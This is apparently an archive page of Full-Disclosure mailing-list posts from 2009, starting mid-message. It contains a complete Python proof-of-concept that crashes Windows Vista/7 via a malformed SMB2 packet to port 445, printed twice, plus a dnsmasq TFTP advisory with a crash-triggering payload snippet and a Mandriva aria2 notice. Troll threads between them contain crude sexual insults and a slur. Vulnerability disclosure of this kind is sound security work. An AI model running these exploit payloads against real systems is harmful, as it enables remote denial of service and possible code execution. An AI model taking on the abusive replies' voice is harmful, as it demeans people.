# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep

host = IP_ADDR, 445
buff = (
\x00\x00\x00\x90 # Begin SMB header: Session message
\xff\x53\x4d\x42 # Server Component: SMB
\x72\x00\x00\x00 # Negociate Protocol
\x00\x18\x53\xc8 # Operation 0x18  sub 0xc853
\x00\x26# Process ID High: -- :) normal value should be
\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe
\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54
\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31
\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00
\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57
\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61
\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c
\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c
\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e
\x30\x30\x32\x00
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
- -
An attacker can remotly crash without no user interaction, any
Vista/Windows 7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.

VI. SYSTEMS AFFECTED
- -
Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly
Win Server 2008
as it use the same SMB2.0 driver (not tested).

VII. SOLUTION
- -
Vendor contacted, but no patch available for the moment.
Close SMB feature and ports, until a patch is provided.

VIII. REFERENCES
- -
http://microsoft.com

IX. CREDITS
- -
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
http://g-laurent.blogspot.com/

X. LEGAL NOTICES
- -
The information contained within this advisory is supplied as-is
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr
mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL
pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC
6kWcu5Q=
=MjSD
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] This is n3td3v and Gary McKinnon's lawyer. My client's have asburger syndrome.

2009-09-09 Thread Valdis . Kletnieks
On Tue, 08 Sep 2009 11:52:55 -, Central Security District of UK [MI7.5] 
said:
 I just go off the phone with intelligence

Congrats. I call Poe's Law on this - it's reached the point where it's
impossible to tell if it's really n3td3v under another alias, or a
sufficiently well-done parody.

:)


pgponamWFjVaf.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CORE-2009-0820 - Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server

2009-09-09 Thread CORE Security Technologies Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/

 Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server


1. *Advisory Information*

Title: Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
Advisory ID: CORE-2009-0820
Advisory URL: http://www.coresecurity.com/content/dnsmasq-vulnerabilities
Date published: 2009-08-31
Date of last update: 2009-08-31
Vendors contacted: Simon Kelley
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Buffer overflow
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 36120, 36121
CVE Name: CVE-2009-2957, CVE-2009-2958


3. *Vulnerability Description*

Dnsmasq is a lightweight DNS forwarder and DHCP server. A vulnerability
has been found that may allow an attacker to execute arbitrary code on
servers or home routers running dnsmasq[1] with the TFTP service[2][3]
enabled ('--enable-tfp'). This service is not enabled by default on most
distributions; in particular it is not enabled by default on OpenWRT or
DD-WRT. Chances of successful exploitation increase when a long
directory prefix is used for TFTP. Code will be executed with the
privileges of the user running dnsmasq, which is normally a
non-privileged one.

Additionally there is a potential DoS attack to the TFTP service by
exploiting a null-pointer dereference vulnerability.


4. *Vulnerable packages*

   . dnsmasq 2.40.
   . dnsmasq 2.41.
   . dnsmasq 2.42.
   . dnsmasq 2.43.
   . dnsmasq 2.44.
   . dnsmasq 2.45.
   . dnsmasq 2.46.
   . dnsmasq 2.47.
   . dnsmasq 2.48.
   . dnsmasq 2.49.
   . Older versions are probably affected too, but they were not checked.


5. *Non-vulnerable packages*

   . dnsmasq 2.50


6. *Vendor Information, Solutions and Workarounds*

If the TFTP service is enabled and patching is not available
immediately, a valid workaround is to filter TFTP for untrusted hosts in
the network (such as the Internet). This is the default configuration
when enabling TFTP on most home routers.

Patches are already available from the software author. Most
distributions should release updates for binary packages soon.


7. *Credits*

The heap-overflow vulnerability (CVE-2009-2957) was discovered during
Bugweek 2009 by Pablo Jorge and Alberto Solino from the team Los
Herederos de Don Pablo of Core Security Technologies.

The null-pointer dereference (CVE-2009-2958) was reported to the author
of dnsmasq independently by an uncredited code auditor. It was merged
with this advisory for user's convenience.


8. *Technical Description*

8.1. *Heap Overflow vulnerability (CVE-2009-2957, BID 36121)*

First let's focus on the overflow vulnerability. The 'tftp_request'
calls 'strncat' on 'daemon-namebuff', which has a predefined size of
'MAXDNAME' bytes (defaulting to 1025).

/---
else if (filename[0] == '/')
   daemon-namebuff[0] = 0;
strncat(daemon-namebuff, filename, MAXDNAME);
- ---/

This may cause a heap overflow because 'daemon-namebuff' may already
contain data, namely the configured 'daemon-tftp_prefix' passed to the
daemon via a configuration file.

/---
if (daemon-tftp_prefix)
{
  if (daemon-tftp_prefix[0] == '/')
daemon-namebuff[0] = 0;
strncat(daemon-namebuff, daemon-tftp_prefix, MAXDNAME)
- ---/

The default prefix is '/var/tftpd', but if a longer prefix is used,
arbitrary code execution may be possible.

Sending the string resulting from the execution of the following python
snippet to a vulnerable server, with a long enough directory prefix
configured, should crash the daemon.

/---
import sys
sys.stdout.write( '\x00\x01' + A*1535 + '\x00' + netascii + '\x00' )
- ---/

8.2. *Null-pointer Dereference vulnerability (CVE-2009-2958, BID 36120)*

Now onto the null-pointer dereference. The user can crash the service by
handcrafting a packet, because of a problem on the guard of the first if
inside this code loop:

/---
while ((opt = next(p, end)))
 {
   if (strcasecmp(opt, blksize) == 0 
   (opt = next(p, end)) 
   !(daemon-options  OPT_TFTP_NOBLOCK))
 {
   transfer-blocksize = atoi(opt);
   if (transfer-blocksize  1)
 transfer-blocksize = 1;
   if (transfer-blocksize  (unsigned)daemon-packet_buff_sz - 4)
  transfer-blocksize = (unsigned)daemon-packet_buff_sz - 4;
   transfer-opt_blocksize = 1;
   transfer-block = 0;
 }

  if (strcasecmp(opt, tsize) == 0  next(p, end) 
  !transfer-netascii)
 {
   transfer-opt_transize = 1;
   transfer-block = 0;
 }
 }
- ---/

The problem exists because the guard of the first if includes the result
of 'opt = next(p, end)' as part of the check. If this returns 'NULL',
the guard will fail and in the next if 'strcasecmp(opt, tsize)' will
derrefence the null-pointer.


9. *Report Timeline*

. 2009-08-20:
Core Security Technologies notifies Simon Kelley of the vulnerability,

[Full-disclosure] [ MDVSA-2009:226 ] aria2

2009-09-09 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:226
 http://www.mandriva.com/security/
 ___

 Package : aria2
 Date: September 9, 2009
 Affected: 2009.0, 2009.1, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in aria2:
 
 aria2 has a buffer overflow which makes it crashing at least on mips.
 
 This update provides a solution to this vulnerability.
 ___

 References:

 https://qa.mandriva.com/52840
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 aca5d2cf89e66c2ce9571a92d4422fdd  
2009.0/i586/aria2-0.15.3-0.20080918.3.1mdv2009.0.i586.rpm 
 426570e80bfb4500ddfb6b614ce00b1d  
2009.0/SRPMS/aria2-0.15.3-0.20080918.3.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 3ffda03aa513f64aae44c753723b6057  
2009.0/x86_64/aria2-0.15.3-0.20080918.3.1mdv2009.0.x86_64.rpm 
 426570e80bfb4500ddfb6b614ce00b1d  
2009.0/SRPMS/aria2-0.15.3-0.20080918.3.1mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 ad69905c7c6705df5e6a45c74bffef2e  
2009.1/i586/aria2-1.2.0-0.20090201.3.1mdv2009.1.i586.rpm 
 50e2057ebaac0901d19ca7feb8063e53  
2009.1/SRPMS/aria2-1.2.0-0.20090201.3.1mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 4b5529526d974780f65a7036424b8aa5  
2009.1/x86_64/aria2-1.2.0-0.20090201.3.1mdv2009.1.x86_64.rpm 
 50e2057ebaac0901d19ca7feb8063e53  
2009.1/SRPMS/aria2-1.2.0-0.20090201.3.1mdv2009.1.src.rpm

 Mandriva Enterprise Server 5:
 3d6e5be8530d12ffd36e9e643a4e4538  
mes5/i586/aria2-0.15.3-0.20080918.3.1mdvmes5.i586.rpm 
 5ffa73ba78d44cf0c61dda3042e23d00  
mes5/SRPMS/aria2-0.15.3-0.20080918.3.1mdvmes5.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 bc874285d1ded702bded3e04767e9aa6  
mes5/x86_64/aria2-0.15.3-0.20080918.3.1mdvmes5.x86_64.rpm 
 5ffa73ba78d44cf0c61dda3042e23d00  
mes5/SRPMS/aria2-0.15.3-0.20080918.3.1mdvmes5.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFKp7sWmqjQ0CJFipgRAnWVAJ9NTr/fWkV54mK2oW+YPvIP9cL3ZwCcCDm9
LSL0lhYX2+XU0QijJNzojuo=
=SGvN
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] This is n3td3v and Gary McKinnon's lawyer. My client's have asburger syndrome.

2009-09-09 Thread mrx


valdis.kletni...@vt.edu wrote:
 On Tue, 08 Sep 2009 11:52:55 -, Central Security District of UK [MI7.5] 
 said:
   
 I just go off the phone with intelligence
 

 Congrats. I call Poe's Law on this - it's reached the point where it's
 impossible to tell if it's really n3td3v under another alias, or a
 sufficiently well-done parody.

 :)
   

Does anybody care?

In fact does anybody who contributes anything useful to this list use
Hushmail? (at this time I am too lazy to look). If not I can set my spam
filter. Amusing as it has been, it has grown tiresome.

btw mr lawyer/mr random guy etc. my dick is bigger than yours, at least
that's what your wife  and sister tell me ;-)

I am a noob with skills marginally better (debatable) than the average
spotty first line support analyst. Therefore constructive criticism is
welcomed, anything else is ignored unless I am bored or stupid enough to
read/repond these postings after a bottle of Shiraz.

regards
the learner aka
MrX

ps I wish I didn't have so much to learn.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] This is n3td3v and Gary McKinnon's lawyer. My client's have asburger syndrome.

2009-09-09 Thread randomguy
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hey, buddy, you know spam filters sometimes can be stupid.
Don't implement a stupid filter in your head.
Just because I mention a troll in my email, have a hushmail
address, and post a link you assume I must be rickrolling you or
something?

I was really surprised when I heard that Gaffie's remote DoS could
infact be remote code exec. Not a mention here, unless I missed
something.

That's the link I posted, and since I don't understand shit to asm,
I was expecting some feedback.

BTW, this is not a flame, but sice you assumed I was trolling, I
just wanted to make clear I was providing info, and waiting for
feedback on it.



PS : I use hush as disposable addresses, and it's none of your
business. And I don't mind my sister sleeping around, she's just a
whore anyway.

- --
Does anybody care?

In fact does anybody who contributes anything useful to this list
use
Hushmail? (at this time I am too lazy to look). If not I can set my
spam
filter. Amusing as it has been, it has grown tiresome.

btw mr lawyer/mr random guy etc. my dick is bigger than yours, at
least
that's what your wife  and sister tell me ;-)

I am a noob with skills marginally better (debatable) than the
average
spotty first line support analyst. Therefore constructive criticism
is
welcomed, anything else is ignored unless I am bored or stupid
enough to
read/repond these postings after a bottle of Shiraz.

regards
the learner aka
MrX

ps I wish I didn't have so much to learn.
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkqoBUAACgkQRVBSp0SbIgej/QP/TfHJGc1k9EsuyMWfEIzLlC1RO1p0
wn34XeBrO/TzHCgam2jhMGSitbtOtOOGjLKyF+gBXGLaFwFDXh/dZamHtrDFLQGdzX2/
u7N5rkOSeiAmUys2K5h1iMMcohUlBpaLvsB9XrqBe1Oq3MFHV+H5NYusZlw1gFXNk0y6
qBRkqZE=
=ymH2
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Question about police harassment. Police trying over years to entrap me as hacker.

2009-09-09 Thread TheLearner
I basically got no friends left. Every last friend I have this 
local detective has pegged every last buddy I have. I'm stuck in my 
house with nobody to turn to..

If you ever had detectives contact all your friends over the past 2 
years trying to get them to inform on you and set you up as a 
hacker or cyberbully... What would you do?

1.) Hire lawyer + private eye to disclose the identity of the 
detective ruining your life, possibly file a law suit?
2.) Move.
3.) 

What would you do?

Please help. This guy is just shutting my life down.

PS They got nothing on me. I've broke no law. I'll never be 
arrested because 1.) I did nothing 2.) I won't do anything, and 
haven't even when they sent informants to set me up. Their just 
bugging me because I know about computers.

regards
the learner aka
MrX

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Question about police harassment. Police trying over years to entrap me as hacker.

2009-09-09 Thread Jeff MacDonald
On Wednesday 09 September 2009 19:44:07 TheLearner wrote:
[...snipped...]

 What would you do?

 Please help. This guy is just shutting my life down.

 regards
 the learner aka
 MrX


do you obtain and use all of your content (music, movies, tvshows) fairly? 

if this guy really is a detective, find out who he is and what agency he is 
affiliated with (if any).

after that you can decide what to do.

regards,
J
-- 
Zoid Technologies: Custom Information Systems
http://zoidtechnologies.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Question about police harassment. Police trying over years to entrap me as hacker.

2009-09-09 Thread auto199984
I would suggest you see a psychologist or psychiatrist to rule out 
paranoia/schizophrenia/etc. just to be on the safe side.

On Wed, 09 Sep 2009 17:44:07 -0600 TheLearner 
mrxisapl...@hush.com wrote:
I basically got no friends left. Every last friend I have this 
local detective has pegged every last buddy I have. I'm stuck in 
my 
house with nobody to turn to..

If you ever had detectives contact all your friends over the past 
2 
years trying to get them to inform on you and set you up as a 
hacker or cyberbully... What would you do?

1.) Hire lawyer + private eye to disclose the identity of the 
detective ruining your life, possibly file a law suit?
2.) Move.
3.) 

What would you do?

Please help. This guy is just shutting my life down.

PS They got nothing on me. I've broke no law. I'll never be 
arrested because 1.) I did nothing 2.) I won't do anything, and 
haven't even when they sent informants to set me up. Their just 
bugging me because I know about computers.

regards
the learner aka
MrX

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Question about police harassment. Police trying over years to entrap me as hacker.

2009-09-09 Thread David Shaw
On Wed, Sep 9, 2009 at 11:43 AM, mrx m...@propergander.org.uk wrote:


 Does anybody care?

 In fact does anybody who contributes anything useful to this list use
 Hushmail? (at this time I am too lazy to look). If not I can set my spam
 filter. Amusing as it has been, it has grown tiresome.


Huh. Yeah, I don't know. I think I'll set a filter on hushmail. Oh, wait,
then I wouldn't get all your other messages!

On Wed, Sep 9, 2009 at 4:44 PM, TheLearner mrxisapl...@hush.com wrote:

 I basically got no friends left. Every last friend I have this
 local detective has pegged every last buddy I have. I'm stuck in my
 house with nobody to turn to..
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-09 Thread James Matthews
So Msoft! why can't they just stop reintroducing bugs?

On Wed, Sep 9, 2009 at 11:04 AM, random...@hushmail.com wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 How come all I hear about is n3td3v, and I see noone crying out
 lout about this :
 http://www.reversemode.com/index.php?option=com_mamblogItemid=15ta
 sk=showaction=viewid=64Itemid=15http://www.reversemode.com/index.php?option=com_mamblogItemid=15ta%0Ask=showaction=viewid=64Itemid=15

 is fd all 'bout trolls nao?

 - --
 =
 - - Release date: September 7th, 2009
 - - Discovered by: Laurent Gaffié
 - - Severity: Medium/High
 =

 I. VULNERABILITY
 - -
 Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

 II. BACKGROUND
 - -
 Windows vista and newer Windows comes with a new SMB version named
 SMB2.
 See:
 http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S
 erver_Message_Block_2.0
 for more details.

 III. DESCRIPTION
 - -
 SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
 PROTOCOL REQUEST functionnality.
 The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send
 to a SMB server, and it's used
 to identify the SMB dialect that will be used for futher
 communication.

 IV. PROOF OF CONCEPT
 - -

 Smb-Bsod.py:

 #!/usr/bin/python
 # When SMB2.0 recieve a  char in the Process Id High SMB
 header field it dies with a
 # PAGE_FAULT_IN_NONPAGED_AREA

 from socket import socket
 from time import sleep

 host = IP_ADDR, 445
 buff = (
 \x00\x00\x00\x90 # Begin SMB header: Session message
 \xff\x53\x4d\x42 # Server Component: SMB
 \x72\x00\x00\x00 # Negociate Protocol
 \x00\x18\x53\xc8 # Operation 0x18  sub 0xc853
 \x00\x26# Process ID High: -- :) normal value should be
 \x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe
 \x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54
 \x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31
 \x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00
 \x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57
 \x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61
 \x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c
 \x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c
 \x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e
 \x30\x30\x32\x00
 )
 s = socket()
 s.connect(host)
 s.send(buff)
 s.close()

 V. BUSINESS IMPACT
 - -
 An attacker can remotly crash without no user interaction, any
 Vista/Windows 7 machine with SMB enable.
 Windows Xp, 2k, are NOT affected as they dont have this driver.

 VI. SYSTEMS AFFECTED
 - -
 Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly
 Win Server 2008
 as it use the same SMB2.0 driver (not tested).

 VII. SOLUTION
 - -
 Vendor contacted, but no patch available for the moment.
 Close SMB feature and ports, until a patch is provided.

 VIII. REFERENCES
 - -
 http://microsoft.com

 IX. CREDITS
 - -
 This vulnerability has been discovered by Laurent Gaffié
 Laurent.gaffie{remove-this}(at)gmail.com
 http://g-laurent.blogspot.com/

 X. LEGAL NOTICES
 - -
 The information contained within this advisory is supplied as-is
 with no warranties or guarantees of fitness of use or otherwise.
 I accept no responsibility for any damage caused by the use or
 misuse of this information.

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
 -BEGIN PGP SIGNATURE-
 Charset: UTF8
 Note: This signature can be verified at https://www.hushtools.com/verify
 Version: Hush 3.0

 wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr
 mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL
 pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC
 6kWcu5Q=
 =MjSD
 -END PGP SIGNATURE-

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




-- 
http://www.jewelerslounge.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/